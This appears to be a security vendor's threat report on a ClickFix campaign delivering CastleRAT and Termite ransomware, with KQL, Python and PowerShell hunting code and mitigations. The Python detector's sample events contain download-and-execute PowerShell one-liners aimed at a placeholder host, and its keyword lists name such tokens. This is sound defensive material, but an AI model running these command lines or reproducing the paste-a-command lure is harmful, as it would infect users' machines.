
Velvet Tempest Exploits ClickFix Technique to Unleash Termite Ransomware and CastleRAT

Security Arsenal Team
March 7, 2026
5 min read

Social engineering remains one of the most reliable initial-access techniques an attacker has. The threat actor tracked as Velvet Tempest has recently been observed running a campaign built on the social-engineering technique known as "ClickFix". By masquerading as a legitimate system error or verification step, the lure gets past the user's usual skepticism and talks them into launching the first stage themselves, which then delivers the CastleRAT backdoor and, ultimately, Termite ransomware.

The ClickFix Mechanism: A Modern Trojan Horse

The "ClickFix" technique works because it preys on a user's desire to fix a problem immediately. Rather than relying on a malicious email attachment, the attack usually begins when the user lands on a compromised or attacker-controlled website. The site then displays a convincing but fake browser error, or a "verify you are human" CAPTCHA that claims to have failed.

The "fix" consists of a short sequence of keystrokes: the page has already placed a command on the clipboard (typically with JavaScript on the button click), and the instructions tell the user to open the Windows Run dialog (Win+R) or a terminal, paste, and press Enter. On Windows the pasted command is usually a PowerShell or mshta one-liner; macOS and Linux variants use a Bash command for Terminal. The command relies on Living Off the Land Binaries (LOLBins), that is, legitimate signed Windows utilities such as powershell.exe and mshta.exe, so the first stage is executed by trusted software under the guise of a system repair. Because the user types the command and the browser never downloads a file, the attack sidesteps download filters, Mark-of-the-Web, attachment scanning, and the endpoint heuristics that key on a browser writing an executable to disk.

The Malware Chain: From DonutLoader to Ransomware

Once the user executes the pasted command, the infection chain begins in earnest. Velvet Tempest uses DonutLoader, a shellcode generator that converts a PE, DLL or .NET assembly into position-independent code (PIC) that is loaded and executed in memory. This "fileless" stage is harder to detect because the payload is never written to disk as a conventional executable. It is not invisible, though: the launching command line, PowerShell script block logs and AMSI still see the script that fetches and runs the shellcode, which is where the detections below focus.

DonutLoader paves the way for CastleRAT, a remote access Trojan that provides the attackers with a persistent foothold. CastleRAT allows for command and control (C2), data exfiltration, and lateral movement across the network. Once the network is adequately mapped and credentials are stolen, the attackers deploy the final payload: Termite ransomware. This results in the encryption of critical files and a demand for ransom, completing the extortion cycle.

Technical Analysis and TTPs

Velvet Tempest's campaign invests heavily in defense evasion. DonutLoader obfuscates the final payload, typically encrypting the embedded module so that signature-based antivirus never sees the CastleRAT binary in the clear. The hand-off from social engineering (ClickFix) to technical execution (LOLBins and in-memory loading) also means no single control sees the whole chain: web and email filters see no download, and endpoint tools see a signed Microsoft binary launched by the interactive user.

The primary attack vectors include:

  • Social Engineering: Fake browser errors, fake CAPTCHA checks and fake update prompts that instruct the user to paste a command.
  • Process Injection: Using DonutLoader to run shellcode inside legitimate host processes such as regsvr32.exe or mshta.exe.
  • Persistence: Establishing C2 channels via CastleRAT to maintain long-term access.

Detection and Threat Hunting

Defending against this campaign requires a shift from reactive blocking to proactive threat hunting. Security teams should monitor for shells and script hosts launched by the interactive user rather than by an installer or management agent: in the ClickFix case the parent process is usually explorer.exe (the Run dialog) or the browser, and the command line carries download-and-execute primitives.

KQL Query (Sentinel/Defender)

Use this KQL query to hunt for PowerShell, cmd.exe or mshta.exe launched from a browser or from explorer.exe (the Win+R Run dialog) with a command line that downloads or decodes content, the pattern a ClickFix lure produces before DonutLoader runs.

Script / Code
DeviceProcessEvents
| where Timestamp > ago(7d)
// Shells and script hosts that ClickFix lures ask the user to run
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")
// Download-and-execute and encoding tokens; has_any matches whole terms,
// so "-Encoding utf8" in a build script does not trip the "enc" term
| where ProcessCommandLine has_any ("enc", "encodedcommand", "iex", "invoke-expression",
    "irm", "invoke-restmethod", "iwr", "invoke-webrequest", "wget", "curl",
    "downloadstring", "frombase64string", "mshta")
// Parent is a browser (command pasted into a terminal) or explorer.exe (pasted into Win+R);
// explorer.exe is the common ClickFix case, so expect some admin noise and tune by AccountName
| where InitiatingProcessFileName in~ ("chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "explorer.exe")
| project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, FileName, ProcessCommandLine
| order by Timestamp desc
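The same hunt as a stand-alone script, added here as an example rather than code from the original post or from any vendor tool. It scores constructed sample process-creation events (the device names, accounts and example.invalid URLs are made up) with the parent-process and command-line heuristics used above, and it decodes -EncodedCommand arguments, which are base64 over UTF-16LE text, so the detection can look inside a payload that the KQL above can only see as an opaque string. The score threshold of 2 is an assumption to tune against your own baseline.

```python
import base64
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Parents that indicate a user-typed command: Win+R (explorer.exe), a browser, or a terminal
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe",
                       "brave.exe", "windowsterminal.exe", "cmd.exe"}

# powershell.exe accepts -e, -ec, -en, -enc and -encodedcommand for the same switch
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression|irm|invoke-restmethod|iwr|"
                           r"invoke-webrequest|curl|wget|downloadstring|frombase64string|"
                           r"start-process|mshta)\b")
HIDE_FLAGS = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden|"
                        r"(?:^|\s)-(?:nop|noprofile)\b|"
                        r"(?:^|\s)-(?:ep|executionpolicy)\s+bypass")


def encode_command(script: str) -> str:
    """Build a -EncodedCommand argument the way powershell.exe expects it: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the plaintext script hidden behind -EncodedCommand, or None if there is none."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev: dict):
    """Count independent ClickFix indicators on one process-creation event."""
    reasons = []
    if ev["FileName"].lower() not in SHELLS:
        return 0, reasons
    if ev["InitiatingProcessFileName"].lower() in INTERACTIVE_PARENTS:
        reasons.append(f"spawned by {ev['InitiatingProcessFileName']}")
    text = ev["ProcessCommandLine"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command present")
        text = text + " " + decoded  # scan the raw and the decoded text together
    if HIDE_FLAGS.search(text):
        reasons.append("hidden window / no profile / execution policy bypass")
    if DOWNLOAD_EXEC.search(text):
        reasons.append("download-and-execute primitive")
    return len(reasons), reasons


def hunt(events, threshold: int = 2):
    """Return the events that reach the threshold, with the decoded payload where one exists."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({"DeviceName": ev["DeviceName"], "AccountName": ev["AccountName"],
                         "score": score, "reasons": reasons,
                         "decoded": decode_encoded_command(ev["ProcessCommandLine"])})
    return hits


# Constructed sample events (not real telemetry); field names mirror DeviceProcessEvents.
SAMPLE_EVENTS = [
    {"DeviceName": "ws01", "AccountName": "alice", "InitiatingProcessFileName": "explorer.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -w hidden -nop -ep bypass -enc "
                           + encode_command("irm https://example.invalid/x | iex")},
    {"DeviceName": "ws02", "AccountName": "bob", "InitiatingProcessFileName": "msedge.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": 'powershell.exe -c "iwr https://example.invalid/a -OutFile '
                           '$env:TEMP\\a.exe; Start-Process $env:TEMP\\a.exe"'},
    # Benign build job: "-Encoding" contains the substring "enc" but is not an encoded command
    {"DeviceName": "ws03", "AccountName": "svc_build", "InitiatingProcessFileName": "devenv.exe",
     "FileName": "powershell.exe",
     "ProcessCommandLine": "powershell.exe -File C:\\build\\encode_assets.ps1 -Encoding utf8"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["DeviceName"], hit["AccountName"], hit["score"], hit["reasons"], hit["decoded"])
```

Feed it an exported DeviceProcessEvents result set (one dict per row) to triage the KQL output offline; the decoded field is usually what tells a ClickFix one-liner apart from an administrator's encoded maintenance script.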

PowerShell Hunting Script

This script checks a single host for the artifacts a ClickFix infection leaves behind: recently written script files in user-writable directories, the Win+R history that a pasted command is recorded in (the RunMRU key), and user-level Run-key entries of the kind CastleRAT-style backdoors use for persistence.

Script / Code
# Hunt for ClickFix / CastleRAT artifacts: recent scripts in user paths,
# Win+R history (RunMRU), and user-level Run key persistence
$TimeThreshold = (Get-Date).AddDays(-3)
$UserPaths = @($env:APPDATA, $env:LOCALAPPDATA, $env:TEMP)

# Recently written script files only (no directories, extension anchored)
$SuspiciousFiles = Get-ChildItem -Path $UserPaths -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object {
        $_.LastWriteTime -gt $TimeThreshold -and
        ($_.Extension -match '^\.(ps1|bat|cmd|vbs|js|hta)$' -or $_.Name -match 'update')
    }

# A command pasted into Win+R is stored under RunMRU as a value ending in "\1"
$RunMRU = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -ErrorAction SilentlyContinue
$RunHistory = if ($RunMRU) {
    $RunMRU.PSObject.Properties |
        Where-Object { $_.Name -notmatch '^(MRUList|PS)' -and $_.Value -match 'powershell|pwsh|mshta|curl|iex|irm|-e[nc]' }
}

# HKCU Run entries that launch from user-writable paths or via a script host
$RunKey = Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -ErrorAction SilentlyContinue
$RunEntries = if ($RunKey) {
    $RunKey.PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS' -and $_.Value -match 'AppData|Temp|powershell|mshta' }
}

if ($SuspiciousFiles -or $RunHistory -or $RunEntries) {
    Write-Host "Potential Threat Artifacts Found:" -ForegroundColor Red
    $SuspiciousFiles | Select-Object FullName, LastWriteTime, Length
    $RunHistory | Select-Object Name, Value
    $RunEntries | Select-Object Name, Value
} else {
    Write-Host "No suspicious artifacts found in the last 3 days." -ForegroundColor Green
}

Mitigation Strategies

To protect your organization from ClickFix and the ransomware that follows it, consider the following actionable steps:

  1. Application Control (AppLocker/WDAC): Restrict powershell.exe, pwsh.exe, cmd.exe and mshta.exe to the administrators and engineers who need them, and run PowerShell in Constrained Language Mode for everyone else. Neither AppLocker nor WDAC evaluates the parent process, so "block browsers from launching shells" has to be an EDR custom rule. For the Win+R variant, the Group Policy "Remove Run menu from Start Menu" (User Configuration > Administrative Templates > Start Menu and Taskbar) disables the Run dialog, including the Win+R shortcut.
  2. User Education: Run specific training on "fake error" and "fake CAPTCHA" scams. Users must understand that no legitimate website or browser will ever ask them to press Win+R or open a terminal and paste a command to fix a connection or verification problem.
  3. ASR Rules: The Office-macro rules do not cover this vector; enable the Microsoft Defender Attack Surface Reduction rules that do, in particular "Block execution of potentially obfuscated scripts", "Block JavaScript or VBScript from launching downloaded executable content", "Block credential stealing from the Windows local security authority subsystem (lsass.exe)" and "Use advanced protection against ransomware". Turn on PowerShell script block logging and keep AMSI enabled so the first-stage script is recorded even when the payload never touches disk.
  4. Network Segmentation: Block SMB, RDP and WinRM between workstations and restrict them toward servers and domain controllers, so a single CastleRAT foothold cannot be turned into domain-wide ransomware deployment.

Conclusion

The Velvet Tempest campaign shows how far social engineering alone can carry an intrusion. By turning the user into an unwitting accomplice via ClickFix, the attackers never trigger the download and email controls the perimeter is built around. Vigilance, combined with hunting queries that key on the process chain and command line, and application control that keeps script hosts away from ordinary users, is essential to stopping Termite ransomware before it encrypts your data.
